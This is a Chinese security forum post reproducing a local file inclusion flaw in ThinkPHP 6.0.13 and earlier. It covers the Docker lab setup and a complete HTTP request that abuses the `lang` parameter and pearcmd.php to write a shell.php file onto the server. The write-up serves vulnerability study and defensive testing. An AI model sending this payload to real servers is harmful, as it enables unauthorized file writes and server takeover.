问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
ThinkPHP 多语言本地文件包含漏洞
# ThinkPHP 多语言本地文件包含漏洞 ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用`lang`参数来包含任意...
ThinkPHP 多语言本地文件包含漏洞 ==================== ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用`lang`参数来包含任意PHP文件。 虽然只能包含本地PHP文件,但在开启了`register_argc_argv`且安装了pcel/pear的环境下,可以包含`/usr/local/lib/php/pearcmd.php`并写入任意文件。 参考链接: - <https://tttang.com/archive/1865/> - <https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp> (本文介绍了`pearcmd.php`利用技巧的原理) 漏洞环境 ---- 执行如下命令启动一个使用ThinkPHP 6.0.12版本开发的Web应用: ```php docker compose up -d ``` 环境启动后,访问`http://your-ip:8080`即可查看到ThinkPHP默认的欢迎页面。 漏洞利用 ---- 首先,ThinkPHP多语言特性不是默认开启的,所以我们可以尝试包含`public/index.php`文件来确认文件包含漏洞是否存在: ![](https://shs3.b.qianxin.com/butian_public/f87964427485d8e9257eed2633e9539e7bd15eb218cda.jpg) 如果漏洞存在,则服务器会出错,返回500页面。 文件包含漏洞存在的情况下还需要服务器满足下面两个条件才能利用: 1. PHP环境开启了`register_argc_argv` 2. PHP环境安装了pcel/pear Docker默认的PHP环境恰好满足上述条件,所以我们可以直接使用下面这个数据包来在写`shell.php`文件: ```php GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 Connection: close Cache-Control: max-age=0 ``` 如果服务器返回pearcmd的命令行执行结果,说明漏洞利用成功: ![](https://shs3.b.qianxin.com/butian_public/f33650550eff5c0618e5a6e53636f499735ff2f340725.jpg) 此时访问`http://your-ip:8080/shell.php`即可发现已经成功写入文件: ![](https://shs3.b.qianxin.com/butian_public/f40521030e3c82b61715b7559280617a17b6bf5d7aa55.jpg)
发表于 2024-07-12 18:51:19
阅读 ( 1845 )
分类:
开发框架
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!